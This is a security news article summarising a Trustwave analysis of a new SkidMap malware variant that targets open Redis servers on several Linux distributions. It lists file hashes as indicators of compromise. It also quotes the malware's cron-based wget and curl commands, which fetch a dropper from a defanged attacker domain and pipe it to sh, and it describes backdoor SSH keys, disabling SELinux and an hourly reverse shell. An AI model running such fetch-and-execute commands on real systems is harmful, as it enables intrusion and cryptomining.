Saturday, February 8, 2025
HomeCyber AttackNew SkidMap Malware Attacking Wide Range of Linux Distributions

New SkidMap Malware Attacking Wide Range of Linux Distributions

Published on

SIEM as a Service

Follow Us on Google News

According to recent reports, there have been instances of threat actors using malware called “SkidMap” to exploit vulnerable Redis systems.

Earlier versions of SkidMap were used to surreptitiously mine cryptocurrency and create false network traffic and CPU usage by loading malicious kernel modules.

However, this malware’s recent version seems quite sophisticated and targets only open Redis instances. 

SkidMap Malware Attacking Linux

Further analysis of the new variant on SkidMap revealed activities like adaptation to the operating system where it gets executed and choosing the binary to download based on the Linux Distribution architecture on the infected system.

SkidMap Malware design (Source: Trustwave)

Initially, the threat actor attempts to login to open Redis instances for setting up cron tasks with a variable using base64 string. These strings consist of two cron tasks to run a “wget” (wget hxxp://z[.]shavsl[.]com/b -qO – | sh) and “curl” (curl -fsSL hxxp://z[.]shavsl[.]com/b | sh)command that gets executed at a 10 minute interval for downloading the dropper scripts ‘b’, ‘c’ and ‘f’.

Base64 encoded cron tasks set up with the variable “SET” (Source: Trustwave)

The dropper scripts are used to download an executable binary file (ELF) ‘gif’ (previous version used ‘jpeg’) to the ‘/var/lib/’ directory, which is the trojan file.

This trojan initially adds some SSH keys in the standard locations ‘/root/.ssh/authoried_keys’ and ‘/root/.ssh/authoried_keys2’. This is done to leave a backdoor for threat actors to login to the system.

Further actions include checking the status of SElinux (Security-Enhanced Linux) module, which is used to implement access control security policies and disable it permanently. After this, the trojan is made permanent by making specific modifications on the host OS.

The trojan creates a reverse shell to the C2 server of the attackers every hour through the TCP/8443 port. The gif binary is found to be targeting linux distributions like Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat, and Rock.

A complete report has been published by Trustwave, which provides a complete explanation on the threat actors’ tactics, methods, source code, and other analysis.

Indicators of Compromise

File Name Hash Type Hashes 
b, c, f MD5 000916c60b2ab828ba8cea914c308999 
SHA1 9970809e1dedce286888f7d25790b4dcca1e704b
SHA256 969e10e4a61cc5f80c414259c4d90c74bcf43ccd5678910700bdc14cd60f9725 
gif MD5 e23b3c7eb5d68e3cd43e9e61a3055fe8 
SHA1 940f45f8a5dfb16281a35cd8303cd98c1ab1fabd 
SHA256 f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367 
jpeg  MD5e23b3c7eb5d68e3cd43e9e61a3055fe8
SHA1940f45f8a5dfb16281a35cd8303cd98c1ab1fabd
SHA256f77c4b704b20affdd737af44cabd3d7b56d8987924f2179137bbeef0e4be0367
.miner MD5 44de739950eb4a8a3552b4e1987e8ec2 
SHA1 0ae049aab363fb8d2e164150dffbafd332725e00 
SHA256 9b81bad2111312e669697b69b9f121a1f9519da61cd5d37689e38381c1ffad28 

Keep informed about the latest Cyber Security News by following us on GoogleNewsLinkedinTwitter, and Facebook.

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Autonomous LLMs Reshaping Pen Testing: Real-World AD Breaches and the Future of Cybersecurity

Large Language Models (LLMs) are transforming penetration testing (pen testing), leveraging their advanced reasoning...

Securing GAI-Driven Semantic Communications: A Novel Defense Against Backdoor Attacks

Semantic communication systems, powered by Generative AI (GAI), are transforming the way information is...

Cybercriminals Target IIS Servers to Spread BadIIS Malware

A recent wave of cyberattacks has revealed the exploitation of Microsoft Internet Information Services...

Hackers Leveraging Image & Video Attachments to Deliver Malware

Cybercriminals are increasingly exploiting image and video files to deliver malware, leveraging advanced techniques...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Autonomous LLMs Reshaping Pen Testing: Real-World AD Breaches and the Future of Cybersecurity

Large Language Models (LLMs) are transforming penetration testing (pen testing), leveraging their advanced reasoning...

Securing GAI-Driven Semantic Communications: A Novel Defense Against Backdoor Attacks

Semantic communication systems, powered by Generative AI (GAI), are transforming the way information is...

Cybercriminals Target IIS Servers to Spread BadIIS Malware

A recent wave of cyberattacks has revealed the exploitation of Microsoft Internet Information Services...